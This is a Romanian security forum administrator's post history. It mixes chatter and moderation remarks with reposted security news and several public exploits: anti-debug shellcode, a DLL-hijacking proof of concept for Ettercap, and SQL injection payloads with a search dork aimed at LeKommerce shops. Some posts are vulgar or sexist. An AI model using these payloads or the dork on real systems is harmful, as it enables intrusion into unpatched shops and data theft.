Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Nu vreau sa par un nenorocit, dar ma pis pe el si pe toata porcaria de Romanii au Talent.
  2. Securitytube Speak Up: The Ms12-020 Fiasco! Suspicions aroused as exploit for critical Windows bug is leaked (Updated) http://aluigi.org/adv/ms12-020_leak.txt
  3. Nytro

    bizar

    IP-uri de Uzbekistan, Thailanda, Mali (nu am auzit de tara asta), Columbia si alte tari, IP-uri care se repeta. E posibil sa fie DDOS, dar e unul penibil si fara sanse de izbanda.
  4. Nytro

    bizar

    Toti pe index, ce cacat cauta? Au fost si 15.000, au mai fost mai mult de 1000, cine stie de ce...
  5. Nu va construiti vise in functie de promisiuni de mariri, realitatea e ceva mai dura.
  6. "si nu stiti ce mortii mamicutelor voastre inseamna un SVN, si google code" Ce cuvinte ai ales ca sa te dai destept...
  7. Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately By Brian Prince on March 13, 2012 Microsoft is urging organizations to apply the sole critical update in this month’s Patch Tuesday release as soon as possible. The critical bulletin – one of six security bulletins issued as part of today’s release – addresses two vulnerabilities in the Remote Desktop Protocol (RDP). “A little about MS12-020…this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP),” Angela Gunn, security response communications manager for Microsoft’s Trustworthy Computing Group, explained in a blog post. “Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems – those running RDP – and is less problematic for those systems with Network Level Authentication (NLA) enabled.” “That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible,” she added. “The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access.” Ben Greenbaum, senior principle software engineer for Symantec’s Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability. “RDP’s purpose is to enable remote access from the Internet, but preferably to an authenticated user,” he said. “In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level.” Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon’s AWS, need to patch as quickly as possible, Qualys CTOWolfgang Kandek opined. “If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft’s NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack,” he said. Besides the RDP bugs, this month’s Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated ‘important’ with the exception of one of the Windows’ denial-of-service bugs, which is rated ‘moderate.’ Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild. Sursa: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot
  8. [h=1]win xp sp2 PEB ISbeingdebugged shellcode[/h] #name: win xp sp2 PEB ISbeingdebugged shellcode #Author: ********* #Contact: teo.manojlovic@skole.hr #Date: 14.12.2009. here is the ASM code made using masm32 if program is being run under debugger the shellcode wil start beeping //////////////////////begin/////////////////////////////////////// .386 .model flat, stdcall option casemap :none INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC INCLUDE C:\MASM32\INCLUDE\USER32.INC INCLUDE C:\MASM32\INCLUDE\MASM32.INC INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB INCLUDELIB C:\MASM32\LIB\USER32.LIB INCLUDELIB C:\MASM32\LIB\MASM32.LIB .data ExitMsg DB "Enter to Exit", 0 .code start: assume fs:nothing mov eax,fs:[30h] mov eax, [eax+02h] mov ebx, 7FFF8000h add ebx,7FFF8000h inc ebx push 300h push 200h mov edx,7c837a8fh cmp eax,ebx jnz exit call edx exit: invoke ExitProcess,NULL end start /////////////////////////////end/////////////////////////////// here is the dump of code using olly debugger 00401000 >/$ 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 00401006 |. 8B40 02 MOV EAX,DWORD PTR DS:[EAX+2] 00401009 |. BB 0080FF7F MOV EBX,7FFF8000 0040100E |. 81C3 0080FF7F ADD EBX,7FFF8000 00401014 |. 43 INC EBX 00401015 |. 68 00030000 PUSH 300 ; /Duration = 768. ms 0040101A |. 68 00020000 PUSH 200 ; |Frequency = 200 (512.) 0040101F |. BA 8F7A837C MOV EDX,kernel32.Beep ; | 00401024 |. 3BC3 CMP EAX,EBX ; | 00401026 |. 75 02 JNZ SHORT antidebu.0040102A ; | 00401028 |. FFD2 CALL EDX ; \Beep 0040102A |> 6A 00 PUSH 0 ; /ExitCode = 0 0040102C \. E8 01000000 CALL <JMP.&kernel32.ExitProcess> ; \ExitProcess 00401031 CC INT3 00401032 .-FF25 00204000 JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess here is the shellcode \x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00 Sursa: win xp sp2 PEB ISbeingdebugged shellcode Anti-debugging eficient...
  9. Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll) /* Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Date: 25/08/2010 Author: ********* Tested on: Windows XP SP3 Vulnerable extensions: .pcap Compile and rename to wpcap.dll, create a file in the same dir .pcap extension and visit http://chaossecurity.wordpress.com/ */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description() { evil(); } DLLIMPORT void pcap_dump() { evil(); } DLLIMPORT void pcap_dump_close() { evil(); } DLLIMPORT void pcap_dump_open() { evil(); } DLLIMPORT void pcap_file() { evil(); } DLLIMPORT void pcap_freecode() { evil(); } DLLIMPORT void pcap_geterr() { evil(); } DLLIMPORT void pcap_getevent() { evil(); } DLLIMPORT void pcap_lib_version() { evil(); } DLLIMPORT void pcap_lookupdev() { evil(); } DLLIMPORT void pcap_lookupnet() { evil(); } DLLIMPORT void pcap_loop() { evil(); } DLLIMPORT void pcap_open_live() { evil(); } DLLIMPORT void pcap_open_offline() { evil(); } DLLIMPORT void pcap_setfilter() { evil(); } DLLIMPORT void pcap_snapshot() { evil(); } DLLIMPORT void pcap_stats() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } Sursa: Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll) Am postat doar ca sa reamintesc acest "truc"...
  10. Pff, nu stiu cum se cheama maneaua
  11. Daca e vorba de o retea locala, Microsoft face toti banii aici... - Communicator (Lync mai nou) permite conferinte - Outlook permite sa stabilesti meeting-uri - Share-ingul e simplu si eficient ............................... Asta daca nu te referi la managementul codului sursa, acolo e alta poveste.
  12. int main(int argc, char* argv[]) { // In argc ai numarul de parametri (+1, fisierul care se executa e argv[0]) // In argv[1]... Ai fiecare parametru // Parcurgi cu un for si vezi daca un parametru e "-name", si daca e, urmatorul parametru, daca exista, o sa fie acel fisier }
  13. Cum am spus, probabil un moderator/administrator a luat aceasta decizie, si sincer, nu stiu cine deocamdata. Problema e ca nu ne bagam peste deciziile altei persoane din staff (pe cat posibil), discutam intre noi apoi ajungem la o concluzie. Ar fi cam aiurea ca cineva sa dea ban si altcineva sa il scoata... Cand o sa aflu despre ce e vorba, probabil vei primi contul inapoi, ai rabdare o zi, doua.
  14. Mersi, ban permanent.
  15. Sunt la munca si nu am putut sa ma uit peste el sa ma dau cu parerea, nu te mai purta copilareste, ca o "attention whore". Codul e frumos organizat, dar nu am timp sa il citesc sa vad exact despre ce e vorba, o sa ma uit diseara.
  16. Daca nu il cheama "Nytro" tot degeaba.
  17. Hackeri: http://2.bp.blogspot.com/-COoyZ5u_me8/T124fMkzWZI/AAAAAAAAFMw/WjjETqyp-fo/s640/Finally+Google+Chrome+gets+hacked+at+Pwn2Own.jpg Vupen Security and Sergey Glazunov independently managed to penetrate Google Chrome’s security defenses at the Pwn2Own and 'Pwnium' contests respectively. The annual competition, which invites ethical hackers from around the world to attempt hacking into the most popular web browsers and in the process expose vulnerabilities and loopholes in the browser's security, while grabbing a handsome reward. At this year's competition, the co-founder and head of research of Vupen, Chaouki Bekrar and his team managed to break into Google Chrome in less than 5 minutes, in the process quashing talks about the browser's unquestionable security. They used "a pair of zero-day vulnerabilities to take complete control of a fully patched 64-bit Windows 7 (SP1) machine." For the successful break-in, Vupen has won itself 32 points. Google Chrome security knew that the Flash Player plugin sandbox is significantly weaker and that an exploit against Chrome’s Flash Player would have to go through a certain path.Having figured out that Vupen used that technique (from the May video), Google decided to add a specific protection for Flash. The hack qualifies him for one of the top $60,000 prizes that are part of Google’s $1 million Pwnium challenge, and could be the launch of a new security career. VUPEN co-founder Chaouki Bekrar, an outspoken exploit writer who insisted the team deliberately targeted Chrome to prove a point, was uncharacteristically coy when asked if the faulty Chrome code came from Adobe.”It was a use-after-free vulnerability in the default installation of Chrome,” he said. “Our exploit worked against the default installation so it really doesn’t matter if it’s third-party code anyway.” Bekrar told, Zdnet reports. IE 9 on Windows 7 was also hacked, again through a complicated hack that had to circumvent the browser’s sandbox. Microsoft, however, may not respond so rapidly, as its quality testing procedure usually takes a few months to fix bugs like these.Safari on Mac OS X Snow Leopard, along with Firefox and IE 8 on Windows XP, was also hacked. Sursa: Finally Google Chrome gets hacked at Pwn2Own | The Hacker News (THN)
  18. Mi-am cumparat azi "Biblia barbatului" si pot sa spun ca e geniala: - "Bea o bere in timp ce te pisi pentru a exemplifica expresia 'a intrat a si iesit'" - "Vinul potrivit pentru orice masa este, in mod surprinzator, berea" - "Nu te baga intr-o bataie intr-un bar de la tara daca nu ai castigat macar un concurs de lupte in viata ta" - "Daca o fata nu isi da jos sutienul in timpul unui masaj, e clar ca nu vei primi nimic. Renunta si deschide o cutie de bere" - "Dupa ce o tipa cu aparat dentar te-a satisfacut oral spune-i ca ti-a placut sa te dai pe sine si de acum inainte numeste-o CFR" - "Cand o tipa spune ca nu face oral, cuprinde-o tandru in brate si spune-i ca este ok, nu e nicio problema... altele fac" - "Un barbat nu poate descrie sub nicio forma o femeie grasa folosind fraza 'Are o fata draguta'" Si multe altele. E vorba despre "barbatii" din ziua de azi, ca devin din ce in ce mai femei, si incearca sa defineasca prin 900+ reguli, cum arata un barbat adevarat.
  19. Design: ISR copiat. Categorii: RST copiat. Noutati: ((void *)0)
  20. Trebuie sa existe o colaborare intre syadmin si programator, ca sysadmin nu poti bloca de exemplu "<script>" pentru ca poate ai gazduit un forum ca RST si vei bloca jumatate dintre posturi. Ca sysadmin, nu poti sa pui reguli pentru a evita SQL Injection, cum ar fi "UNION" pentru ca pot fi mesaje care sa contina acest cuvant perfect valide, care sa nu aiba nici cea mai mica legatura cu SQLI. Nu poti nici macar sa blochezi doua request-uri in mai putin de o secunda pentru ca se intampla ca aici, deschizi doua tab-uri si unul dintre ele e blocat si risti sa pierzi clienti. Programatorii vin cu tot felul de pretentii ca sa mearga scripturile lor, ceea ce e si normal, insa e problema lor sa se ocupe de securitatea APLICATIILOR WEB nu a sysadminilor. Ca folosesc scripturi 3rd party, de asemenea, e problema lor. Nu e vina sysadminului ca aplicatia are SQL Injection. Si oricum am spune, administratorii tot petrec mult timp sa verifice loguri, sa vada unde pot sa apara probleme in aplicatie si sa incerce sa le rezolve de pe partea de administrare, ceea ce repet, nu e ok, pentru ca ulterior pot sa apara probleme. Sysadmin: "Ba, esti tampit, ai SQL Injection in aplicatie, uite aici cateva loguri, uite ca unii au dat cu Acunetix si altii cu Havij, asta e parametru vulerabil, repara problema, doar nu o sa stau eu sa dau DROP la pachete pe baza de sute de vectori ce pot fi folositi pentru ca tu nu faci o filtrare pe parametrii aplicatiei".
  21. Benny, du-te si vorbeste cu un sysadmin si discutam apoi.
  22. Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 Gobejishvili (longrifle0x) from The Vulnerability Laboratory Research Team discover Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37. GOM Player (Gretech Online Movie Player) is a 32/64-bit media player for Microsoft Windows, distributed by the Gretech Corporation of South Korea. A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In this case, The vulnerability can be exploited by local or remote attackers and Vulnerable module is GomU+0x125cb7. Proof of Concept: 1) Download & open the software client 2) Click open ==> Url.. 3) Put vulnerability code 4) now you will see result http://www.youtube.com/watch?v=uN87KAm53Zg&feature=player_embedded In buffer overflow attacks, the extra data may contain codes designed to trigger actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Sursa: [POC] Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 | The Hacker News (THN)
  23. printf() tricks Prin'() tricks Agenda • ShiMing the stack pointer & arbitrary mem writes… • … in order to exploit format string bugs without %n • When is a NULL pointer not just a NULL pointer? • …don’t expect prin'() & family to crash on NULL pointers • These are just a few things I played with a while back Download: http://cdn03.exploit-db.com/wp-content/themes/exploit/docs/18577.pdf
  24. [h=1]SQLI Online Shop LeKommerce[/h] # Author: Mazt0r # Exploit Title: Online Shop SQLI LeKommerce # Date: 04 MARCH 2012 # software: LeKommerce # link: http://www.lekommerce.com/ # Version: "All version's" # Category: Commerce online # Tested on: Linux D0rk: inurl:secc.php?id= ===================================== Exploit : ====================== http://localhost/path/secc.php?id={sqli} ====================== Example: ====================== http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7-- http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables-- ====================== dbs: ====================== +--------------------------------+ | t_clientes | | t_colores | | t_colores_idiomas | | t_configuracionglobal | | t_emailing | | t_emailingcliente | | t_facturascompra | | t_facturasventa | | t_familias | | t_familias_idiomas | | t_formaspago | | t_idiomas | | t_incidencias | | t_iva | | t_marcas | | t_menusuperior | | t_noticias | | t_productos | | t_productos_idiomas | | t_proveedores | | t_provincias | | t_rel_productos_tallas_colores | | t_rel_tallas_colores | | t_seccionesproductos | | t_seccionesproductos_idiomas | | t_series | | t_subfamilias | | t_subfamilias_idiomas | | t_tallas | | t_tallas_idiomas | | t_tiposperfiles | | t_traducciones | | t_usuarios | +--------------------------------+ PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC! --------------Gr33tZ------------------ DDLR - CYBERLOCOS - Thelatin - K4rl -Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Firends! ---------------------------------- Blog: maztor.blogspot.com Twitter: @Mazt0r ---------------------------------- Sursa: SQLI Online Shop LeKommerce
×
×
  • Create New...